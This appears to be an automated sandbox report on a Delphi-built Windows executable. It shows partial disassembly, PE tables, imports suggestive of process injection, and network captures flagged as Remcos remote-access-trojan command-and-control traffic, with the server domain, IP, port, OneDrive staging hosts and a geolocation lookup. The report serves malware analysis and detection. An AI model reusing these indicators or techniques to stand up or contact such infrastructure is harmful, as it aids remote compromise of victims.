call 00007F67BCE2EDB5h
mov eax, dword ptr [004FDDECh]
mov eax, dword ptr [eax]
call 00007F67BCE2EE29h
call 00007F67BCDD9D44h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x102000	0x2b60	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10f000	0x9a00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x107000	0x7128	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x106000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10288c	0x6ac	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x721b8	0x72200	False	0.5304392285049289	data	6.574825635312279	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x74000	0x2c0c	0x2e00	False	0.36506453804347827	data	5.400860673873409	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x77000	0x86f8c	0x87000	False	0.5968786168981481	data	7.295360828948748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xfe000	0x369c	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x102000	0x2b60	0x2c00	False	0.3210227272727273	data	5.090640426780868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x105000	0x34	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x106000	0x18	0x200	False	0.05078125	data	0.20134432838821048	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x107000	0x7128	0x7200	False	0.656969572368421	data	6.699141454471892	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x10f000	0x9a00	0x9a00	False	0.37203226461038963	data	5.070700304000019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x10f734	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x10f868	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x10f99c	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x10fad0	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x10fc04	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x10fd38	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x10fe6c	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0x10ffa0	0x3a48	Device independent bitmap graphic, 60 x 120 x 32, image size 14880			0.03646112600536193
RT_STRING	0x1139e8	0x244	AmigaOS bitmap font "P", fc_YSize 28672, 18944 elements, 2nd "t", 3rd "w"			0.47586206896551725
RT_STRING	0x113c2c	0x384	data			0.42777777777777776
RT_STRING	0x113fb0	0xb8	data			0.6793478260869565
RT_STRING	0x114068	0xf8	data			0.6290322580645161
RT_STRING	0x114160	0x400	data			0.4013671875
RT_STRING	0x114560	0x3a4	data			0.38197424892703863
RT_STRING	0x114904	0x370	data			0.4022727272727273
RT_STRING	0x114c74	0x3cc	data			0.33539094650205764
RT_STRING	0x115040	0x214	data			0.49624060150375937
RT_STRING	0x115254	0xcc	data			0.6274509803921569
RT_STRING	0x115320	0x194	data			0.5643564356435643
RT_STRING	0x1154b4	0x3c4	data			0.3288381742738589
RT_STRING	0x115878	0x338	data			0.42961165048543687
RT_STRING	0x115bb0	0x294	data			0.42424242424242425
RT_RCDATA	0x115e44	0x10	data			1.5
RT_RCDATA	0x115e54	0x27c	data			0.7374213836477987
RT_RCDATA	0x1160d0	0x26e9	Delphi compiled form 'TForm_ouvrir_l_imprimante'			0.9308302379279189
RT_GROUP_CURSOR	0x1187bc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x1187d0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x1187e4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1187f8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x11880c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x118820	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x118834	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x118848	0x14	data			1.25

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, GetActiveObject, SysFreeString
ole32.dll	CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
winspool.drv	OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
comdlg32.dll	PrintDlgA
invalid	NtWriteVirtualMemory
Kernel32	GetProcAddress
ntdll	NtProtectVirtualMemory
uRL	AutodialHookCallback
ntdll	NtQueryInformationFile, NtOpenFile, NtClose, NtReadFile
ntdll	RtlDosPathNameToNtPathName_U

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
23.172.112.72192.168.2.42404496822032777 08/04/23-18:16:13.628852	TCP	2032777	ET TROJAN Remcos 3.x Unencrypted Server Response	2404	49682	23.172.112.72	192.168.2.4
192.168.2.423.172.112.724968224042032776 08/04/23-18:14:07.921866	TCP	2032776	ET TROJAN Remcos 3.x Unencrypted Checkin	49682	2404	192.168.2.4	23.172.112.72

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 4, 2023 18:14:07.813781977 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:07.918155909 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:14:07.918606997 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:07.921865940 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:08.075717926 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:14:08.279007912 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:14:08.281831980 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:08.385210037 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:14:08.426059008 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:08.625677109 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:14:08.650679111 CEST	80	49683	178.237.33.50	192.168.2.4
Aug 4, 2023 18:14:08.651124954 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:14:08.657044888 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:14:08.687000036 CEST	80	49683	178.237.33.50	192.168.2.4
Aug 4, 2023 18:14:08.687117100 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:14:08.858272076 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:09.017151117 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:14:09.686079979 CEST	80	49683	178.237.33.50	192.168.2.4
Aug 4, 2023 18:14:09.686184883 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:14:13.552052021 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:14:13.650162935 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:13.756149054 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:13.912547112 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:14:43.563677073 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:14:43.565615892 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:14:43.723748922 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:15:13.586796999 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:15:13.589332104 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:15:13.745806932 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:15:43.607604980 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:15:43.609829903 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:15:43.767551899 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:15:58.505151033 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:15:58.817106962 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:15:59.426681995 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:16:00.629815102 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:16:03.036223888 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:16:07.849226952 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:16:13.628851891 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:16:13.677814007 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:16:13.814678907 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:16:13.969180107 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:16:17.521903992 CEST	49683	80	192.168.2.4	178.237.33.50
Aug 4, 2023 18:16:43.665235996 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:16:43.668330908 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:16:43.825462103 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:17:13.683264971 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:17:13.686083078 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:17:13.843190908 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:17:43.704272985 CEST	2404	49682	23.172.112.72	192.168.2.4
Aug 4, 2023 18:17:43.711190939 CEST	49682	2404	192.168.2.4	23.172.112.72
Aug 4, 2023 18:17:43.879333019 CEST	2404	49682	23.172.112.72	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 4, 2023 18:13:57.788178921 CEST	51600	53	192.168.2.4	8.8.8.8
Aug 4, 2023 18:13:58.548813105 CEST	57417	53	192.168.2.4	8.8.8.8
Aug 4, 2023 18:14:07.613934040 CEST	50982	53	192.168.2.4	8.8.8.8
Aug 4, 2023 18:14:07.801903963 CEST	53	50982	8.8.8.8	192.168.2.4
Aug 4, 2023 18:14:08.594635963 CEST	60080	53	192.168.2.4	8.8.8.8
Aug 4, 2023 18:14:08.617824078 CEST	53	60080	8.8.8.8	192.168.2.4
Aug 4, 2023 18:14:14.103719950 CEST	61105	53	192.168.2.4	8.8.8.8
Aug 4, 2023 18:14:14.756884098 CEST	56572	53	192.168.2.4	8.8.8.8
Aug 4, 2023 18:14:20.915117025 CEST	50911	53	192.168.2.4	8.8.8.8
Aug 4, 2023 18:14:21.614938021 CEST	59683	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 4, 2023 18:13:57.788178921 CEST	192.168.2.4	8.8.8.8	0x63b8	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:13:58.548813105 CEST	192.168.2.4	8.8.8.8	0x33a7	Standard query (0)	ayhtnw.dm.files.1drv.com	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:14:07.613934040 CEST	192.168.2.4	8.8.8.8	0x6b7d	Standard query (0)	www.binccoco.com	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:14:08.594635963 CEST	192.168.2.4	8.8.8.8	0x8b46	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:14:14.103719950 CEST	192.168.2.4	8.8.8.8	0x4de5	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:14:14.756884098 CEST	192.168.2.4	8.8.8.8	0x257e	Standard query (0)	ayhtnw.dm.files.1drv.com	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:14:20.915117025 CEST	192.168.2.4	8.8.8.8	0x3019	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:14:21.614938021 CEST	192.168.2.4	8.8.8.8	0x87fa	Standard query (0)	ayhtnw.dm.files.1drv.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 4, 2023 18:13:57.841723919 CEST	8.8.8.8	192.168.2.4	0x63b8	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:13:57.841723919 CEST	8.8.8.8	192.168.2.4	0x63b8	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:13:58.615603924 CEST	8.8.8.8	192.168.2.4	0x33a7	No error (0)	ayhtnw.dm.files.1drv.com	dm-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:13:58.615603924 CEST	8.8.8.8	192.168.2.4	0x33a7	No error (0)	dm-files.fe.1drv.com	odc-dm-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:14:07.801903963 CEST	8.8.8.8	192.168.2.4	0x6b7d	No error (0)	www.binccoco.com		23.172.112.72	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:14:08.617824078 CEST	8.8.8.8	192.168.2.4	0x8b46	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false
Aug 4, 2023 18:14:14.132591009 CEST	8.8.8.8	192.168.2.4	0x4de5	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:14:14.132591009 CEST	8.8.8.8	192.168.2.4	0x4de5	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:14:14.805712938 CEST	8.8.8.8	192.168.2.4	0x257e	No error (0)	ayhtnw.dm.files.1drv.com	dm-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:14:14.805712938 CEST	8.8.8.8	192.168.2.4	0x257e	No error (0)	dm-files.fe.1drv.com	odc-dm-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:14:20.978816986 CEST	8.8.8.8	192.168.2.4	0x3019	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:14:20.978816986 CEST	8.8.8.8	192.168.2.4	0x3019	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:14:21.634728909 CEST	8.8.8.8	192.168.2.4	0x87fa	No error (0)	ayhtnw.dm.files.1drv.com	dm-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 4, 2023 18:14:21.634728909 CEST	8.8.8.8	192.168.2.4	0x87fa	No error (0)	dm-files.fe.1drv.com	odc-dm-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49683	178.237.33.50	80	C:\Users\Public\Libraries\flhgywjG.bat

Timestamp	kBytes transferred	Direction	Data
Aug 4, 2023 18:14:08.657044888 CEST	998	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Aug 4, 2023 18:14:08.687000036 CEST	999	IN	HTTP/1.1 200 OK date: Fri, 04 Aug 2023 16:14:08 GMT server: Apache/2.4.52 (Ubuntu) content-length: 944 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 47 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 31 37 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 34 32 30 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 